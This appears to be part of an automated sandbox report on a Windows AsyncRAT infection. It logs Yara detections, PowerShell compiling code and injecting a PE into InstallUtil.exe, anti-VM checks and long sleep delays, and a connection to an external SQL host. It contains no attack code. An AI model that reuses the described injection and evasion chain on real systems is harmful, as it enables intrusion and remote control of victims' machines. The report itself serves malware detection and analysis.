Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected RUNPE

Source: Yara match	File source: 00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\gia9ab2dg0.PS1, type: DROPPED

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Source: C:\Windows\System32\wscript.exe TID: 7136	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4984	Thread sleep count: 6172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep count: 3199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 34 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6652	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 6515 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 3038 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3038

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FFEBC9A0FDD sldt word ptr [eax]

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\

Source: InstallUtil.exe, 0000000E.00000002.911146064.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hGFsj
Source: wscript.exe, 00000000.00000003.391544975.000001C9E3EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401953854.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407672087.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392257266.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392112337.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392759428.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398093157.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.397854670.000001C9E3EB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.390175419.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407629768.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000002.00000003.519628878.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.536219164.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 199.102.48.248 1433
Source: C:\Windows\System32\wscript.exe	Domain query: SQL8003.site4now.net

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1196008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EE008

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs

Jump to dropped file

.NET source code references suspicious native API functions

Source: 5arm45ue.dll.8.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: lvvchi0q.dll.15.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

